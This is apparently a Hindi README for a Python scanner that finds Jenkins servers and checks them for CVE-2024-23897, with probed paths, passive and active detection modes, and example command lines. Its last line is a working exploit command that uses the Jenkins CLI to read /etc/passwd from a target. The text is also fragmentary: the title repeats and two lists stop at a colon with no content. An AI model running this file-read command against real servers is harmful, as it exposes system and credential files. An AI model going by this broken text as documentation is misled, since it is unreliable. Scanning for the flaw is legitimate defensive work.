
जेन्किन्स वातावरण खोजें और CVE-2024-23897 के लिए जाँच करें
जेनकिंस वातावरण खोजें और CVE-2024-23897 की जाँच करें
पथों का परीक्षण: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json
इसके माध्यम से पहचानता है:
निष्क्रिय (डिफ़ॉल्ट): पता लगाए गए संस्करण की thresholds से तुलना करता है:
सक्रिय (--active): HTTP पर Jenkins CLI के बाइनरी प्रोटोकॉल का हैंडशेक भेजता है। यदि सर्वर 200 + Content-Type: application/octet-stream के साथ प्रतिक्रिया करता है, तो यह पुष्टि करता है कि CLI चैनल खुला है और exploit लागू है।
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"